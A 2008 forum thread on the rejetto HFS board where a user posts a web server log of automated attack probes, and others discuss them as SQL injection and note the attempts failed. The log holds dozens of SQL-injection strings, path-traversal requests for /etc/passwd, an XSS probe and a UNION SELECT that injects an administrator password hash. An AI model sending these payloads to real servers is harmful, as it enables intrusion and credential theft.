rejetto forum

SQL database Hack Attempt

Guest · 6 · 8469
« previous next »
Pages: 1

0 Members and 1 Guest are viewing this topic.

jerome

  • Guest
on: February 18, 2008, 08:54:05 AM
Hello,
be careful if you use a SQL database, i received some Hacking request on HFS 179.
i don't use macro or SQL database, but if you use one, maybe it can help you.

if you learn hacking also... ;D
Code: [Select]
Requested GET /home/
Fully downloaded - 27 B @ 0 KB/s - /home/
Requested GET /~folder.tar
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar
Requested GET /?ho+{COMPLETE_VERSION}
Requested GET /?cmd=Config
Requested GET /?<script>cross_site_scripting.nasl</script>
Requested GET /home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
Fully downloaded - 27 B @ 2 KB/s - /home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
Requested GET /home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
Fully downloaded - 27 B @ 2 KB/s - /home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
Requested GET /~folder.tar?recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?recursive=
Requested GET /~folder.tar?1055944474
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?1055944474
Requested GET /~folder.tar?-='UNION'&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='UNION'&recursive=
Requested GET /~folder.tar?-='+AND+'b'>'a&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-='+AND+'b'>'a&recursive=
Requested GET /~folder.tar?-='&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='&recursive=
Requested GET /~folder.tar?-='&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='&recursive=
Requested GET /~folder.tar?-=+AND+1=1&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=+AND+1=1&recursive=
Requested GET /~folder.tar?-='&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='&recursive=
Requested GET /~folder.tar?-='"&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-='"&recursive=
Requested GET /~folder.tar?-=+AND+1=1)&recursive=
Fully downloaded - 512 B @ 16 KB/s - /~folder.tar?-=+AND+1=1)&recursive=
Requested GET /~folder.tar?-='&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='&recursive=
Requested GET /~folder.tar?-=9,+9,+9&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-=9,+9,+9&recursive=
Requested GET /~folder.tar?-=/**/&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=/**/&recursive=
Requested GET /~folder.tar?-='&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-='&recursive=
Requested GET /~folder.tar?-='bad_bad_value&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-='bad_bad_value&recursive=
Requested GET /~folder.tar?-=bad_bad_value'&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=bad_bad_value'&recursive=
Requested GET /~folder.tar?-='+OR+'&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='+OR+'&recursive=
Requested GET /~folder.tar?-='WHERE&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-='WHERE&recursive=
Requested GET /~folder.tar?-=;&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-=;&recursive=
Requested GET /~folder.tar?-='OR&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='OR&recursive=
Requested GET /~folder.tar?-='
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-='
Requested GET /~folder.tar?-=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=
Requested GET /~folder.tar?-='
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-='
Requested GET /~folder.tar?-=')
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=')
Requested GET /~folder.tar?-=char(39)&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-=char(39)&recursive=
Requested GET /~folder.tar?-='&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-='&recursive=
Requested GET /~folder.tar?-='+OR+1=1)&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='+OR+1=1)&recursive=
Requested GET /~folder.tar?-='+OR+1=1))&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='+OR+1=1))&recursive=
Requested GET /~folder.tar?-='+OR+1=1#&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-='+OR+1=1#&recursive=
Requested GET /~folder.tar?-='+OR+1=1)#&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-='+OR+1=1)#&recursive=
Requested GET /~folder.tar?-='+OR+1=1))#&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='+OR+1=1))#&recursive=
Requested GET /~folder.tar?-=&#39;+OR+&#39;a&#39;<&#39;b&recursive=
Fully downloaded - 512 B @ 16 KB/s - /~folder.tar?-=&#39;+OR+&#39;a&#39;<&#39;b&recursive=
Requested GET /~folder.tar?-=&#39;)+OR+(&#39;a&#39;<&#39;b&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&#39;)+OR+(&#39;a&#39;<&#39;b&recursive=
Requested GET /~folder.tar?-=&#39;)+OR+(&#39;a&#39;<&#39;b&#39;)/*&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-=&#39;)+OR+(&#39;a&#39;<&#39;b&#39;)/*&recursive=
Requested GET /~folder.tar?-=&#39;)+OR+(&#39;a&#39;<&#39;b&#39;))/*&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&#39;)+OR+(&#39;a&#39;<&#39;b&#39;))/*&recursive=
Requested GET /~folder.tar?-='+or+1=1/*&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-='+or+1=1/*&recursive=
Requested GET /~folder.tar?-='+or+1=1)/*&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='+or+1=1)/*&recursive=
Requested GET /~folder.tar?-='+or+1=1))/*&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='+or+1=1))/*&recursive=
Requested GET /~folder.tar?-=--+&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=--+&recursive=
Requested GET /~folder.tar?-=#&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=#&recursive=
Requested GET /~folder.tar?-=/*&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=/*&recursive=
Requested GET /~folder.tar?-="&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-="&recursive=
Requested GET /~folder.tar?-="&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-="&recursive=
Requested GET /~folder.tar?-=%27&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=%27&recursive=
Requested GET /~folder.tar?-='+convert(int,convert(varchar,0x7b5d))+'&recursive=
Fully downloaded - 512 B @ 17 KB/s - /~folder.tar?-='+convert(int,convert(varchar,0x7b5d))+'&recursive=
Requested GET /~folder.tar?-=convert(int,convert(varchar,0x7b5d))&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=convert(int,convert(varchar,0x7b5d))&recursive=
Requested GET /~folder.tar?-='+convert(varchar,0x7b5d)+'&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-='+convert(varchar,0x7b5d)+'&recursive=
Requested GET /~folder.tar?-=convert(varchar,0x7b5d)&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=convert(varchar,0x7b5d)&recursive=
Requested GET /~folder.tar?-='+convert(int,convert(varchar,0x7b5d))+'&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-='+convert(int,convert(varchar,0x7b5d))+'&recursive=
Requested GET /~folder.tar?-='+convert(varchar,0x7b5d)+'&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-='+convert(varchar,0x7b5d)+'&recursive=
Requested GET /~folder.tar?-=convert(int,convert(varchar,0x7b5d))&recursive=
Fully downloaded - 512 B @ 17 KB/s - /~folder.tar?-=convert(int,convert(varchar,0x7b5d))&recursive=
Requested GET /~folder.tar?-=convert(varchar,0x7b5d)&recursive=
Fully downloaded - 512 B @ 11 KB/s - /~folder.tar?-=convert(varchar,0x7b5d)&recursive=
Requested GET /~folder.tar?recursive=
Fully downloaded - 512 B @ 17 KB/s - /~folder.tar?recursive=
Requested GET /~folder.tar?1055944474
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?1055944474
Requested GET /~folder.tar?-=&recursive='UNION'
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='UNION'
Requested GET /~folder.tar?-=&recursive='+AND+'b'>'a
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='+AND+'b'>'a
Requested GET /~folder.tar?-=&recursive='
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-=&recursive='
Requested GET /~folder.tar?-=&recursive='
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='
Requested GET /~folder.tar?-=&recursive=+AND+1=1
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-=&recursive=+AND+1=1
Requested GET /~folder.tar?-=&recursive='
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='
Requested GET /~folder.tar?-=&recursive='"
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='"
Requested GET /~folder.tar?-=&recursive=+AND+1=1)
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive=+AND+1=1)
Requested GET /~folder.tar?-=&recursive='
Fully downloaded - 512 B @ 17 KB/s - /~folder.tar?-=&recursive='
Requested GET /~folder.tar?-=&recursive=9,+9,+9
Fully downloaded - 512 B @ 17 KB/s - /~folder.tar?-=&recursive=9,+9,+9
Requested GET /~folder.tar?-=&recursive=/**/
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=/**/
Requested GET /~folder.tar?-=&recursive='
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='
Requested GET /~folder.tar?-=&recursive='bad_bad_value
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive='bad_bad_value
Requested GET /~folder.tar?-=&recursive=bad_bad_value'
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive=bad_bad_value'
Requested GET /~folder.tar?-=&recursive='+OR+'
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive='+OR+'
Requested GET /~folder.tar?-=&recursive='WHERE
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='WHERE
Requested GET /~folder.tar?-=&recursive=;
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive=;
Requested GET /~folder.tar?-=&recursive='OR
Fully downloaded - 512 B @ 17 KB/s - /~folder.tar?-=&recursive='OR
Requested GET /~folder.tar?-=&recursive='
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='
Requested GET /~folder.tar?-=&recursive=
Fully downloaded - 512 B @ 16 KB/s - /~folder.tar?-=&recursive=
Requested GET /~folder.tar?-=&recursive='
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive='
Requested GET /~folder.tar?-=&recursive=')
Fully downloaded - 512 B @ 16 KB/s - /~folder.tar?-=&recursive=')
Requested GET /~folder.tar?-=&recursive=char(39)
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=char(39)
Requested GET /~folder.tar?-=&recursive='
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive='
Requested GET /~folder.tar?-=&recursive='+OR+1=1)
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive='+OR+1=1)
Requested GET /~folder.tar?-=&recursive='+OR+1=1))
Fully downloaded - 512 B @ 11 KB/s - /~folder.tar?-=&recursive='+OR+1=1))
Requested GET /~folder.tar?-=&recursive='+OR+1=1#
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive='+OR+1=1#
Requested GET /~folder.tar?-=&recursive='+OR+1=1)#
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='+OR+1=1)#
Requested GET /~folder.tar?-=&recursive='+OR+1=1))#
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='+OR+1=1))#
Requested GET /~folder.tar?-=&recursive=&#39;+OR+&#39;a&#39;<&#39;b
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=&#39;+OR+&#39;a&#39;<&#39;b
Requested GET /~folder.tar?-=&recursive=&#39;)+OR+(&#39;a&#39;<&#39;b
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive=&#39;)+OR+(&#39;a&#39;<&#39;b
Requested GET /~folder.tar?-=&recursive=&#39;)+OR+(&#39;a&#39;<&#39;b&#39;)/*
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=&#39;)+OR+(&#39;a&#39;<&#39;b&#39;)/*
Requested GET /~folder.tar?-=&recursive=&#39;)+OR+(&#39;a&#39;<&#39;b&#39;))/*
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=&#39;)+OR+(&#39;a&#39;<&#39;b&#39;))/*
Requested GET /~folder.tar?-=&recursive='+or+1=1/*
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='+or+1=1/*
Requested GET /~folder.tar?-=&recursive='+or+1=1)/*
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='+or+1=1)/*
Requested GET /~folder.tar?-=&recursive='+or+1=1))/*
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='+or+1=1))/*
Requested GET /~folder.tar?-=&recursive=--+
Fully downloaded - 512 B @ 17 KB/s - /~folder.tar?-=&recursive=--+
Requested GET /~folder.tar?-=&recursive=#
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive=#
Requested GET /~folder.tar?-=&recursive=/*
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=/*
Requested GET /~folder.tar?-=&recursive="
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive="
Requested GET /~folder.tar?-=&recursive="
Fully downloaded - 512 B @ 17 KB/s - /~folder.tar?-=&recursive="
Requested GET /~folder.tar?-=&recursive=%27
Fully downloaded - 512 B @ 17 KB/s - /~folder.tar?-=&recursive=%27
Requested GET /~folder.tar?-=&recursive='+convert(int,convert(varchar,0x7b5d))+'
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive='+convert(int,convert(varchar,0x7b5d))+'
Requested GET /~folder.tar?-=&recursive=convert(int,convert(varchar,0x7b5d))
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=convert(int,convert(varchar,0x7b5d))
Requested GET /~folder.tar?-=&recursive='+convert(varchar,0x7b5d)+'
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive='+convert(varchar,0x7b5d)+'
Requested GET /~folder.tar?-=&recursive=convert(varchar,0x7b5d)
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=convert(varchar,0x7b5d)
Requested GET /~folder.tar?-=&recursive='+convert(int,convert(varchar,0x7b5d))+'
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='+convert(int,convert(varchar,0x7b5d))+'
Requested GET /~folder.tar?-=&recursive='+convert(varchar,0x7b5d)+'
Fully downloaded - 512 B @ 16 KB/s - /~folder.tar?-=&recursive='+convert(varchar,0x7b5d)+'
Requested GET /~folder.tar?-=&recursive=convert(int,convert(varchar,0x7b5d))
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=convert(int,convert(varchar,0x7b5d))
Requested GET /~folder.tar?-=&recursive=convert(varchar,0x7b5d)
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=convert(varchar,0x7b5d)
Requested GET /?Mode=debug
Requested GET /?Mode=debug
Requested GET /?mod=read&id=../../../../../../../../../../../../../etc/passwd8:18:23 AM 87.202.10.179:21637 Requested GET /
Requested GET /?user=jffnms_user_sql_injection.nasl' UNION SELECT 2,'admin','$1$RxS1ROtX$IzA1S3fcCfyVfA9rwKBMi.','Administrator'/*&file=index&pass=
Requested GET /home
8:18:42 AM 87.202.10.179:21840 Fully downloaded - 27 B @ 2 KB/s - /home
A Greek IP asking a korean translation, welcome on web joke chanel.

Offline MarkV

  • Tireless poster
  • ****
    • Posts: 764
    • View Profile
Reply #1 on: February 18, 2008, 09:55:02 AM
What a mess. IPs can be spoofed, though. The attacker very likely uses a proxy network like TOR to hide his identity.
http://worldipv6launch.org - The world is different now.

Offline TSG

  • Operator
  • Tireless poster
  • *****
    • Posts: 1935
    • View Profile
    • RAWR-Designs
Reply #2 on: February 19, 2008, 03:29:47 PM
This is HFS related? I have moved it to the HFS board.

Offline Giant Eagle

  • Tireless poster
  • ****
    • Posts: 535
  • >=3 RAWR!
    • View Profile
    • RAWR-Designs.com
Reply #3 on: February 19, 2008, 06:38:28 PM
Don't worry, every attempt was a fail

HFS has no such thing as a database

Offline Fysack

  • Tireless poster
  • ****
    • Posts: 598
  • present picture
    • View Profile
    • Admin
Reply #4 on: March 02, 2008, 12:27:45 AM
I belive this is what they call an SQL-injection. Guessing their way in, based upon the different error messages recived. Offcurse this has noting to do with HFS, HFS is fucking bulletproof man, hehe  8)
GOD CAN READ YOUR MIND

Offline xinnv

  • Occasional poster
  • *
    • Posts: 9
  • 当年在学校抓图
    • View Profile
    • 陈店人之家
Reply #5 on: October 22, 2008, 08:15:34 AM
iis write ,use the http protacal!
you can use get, post etc

Pages: 1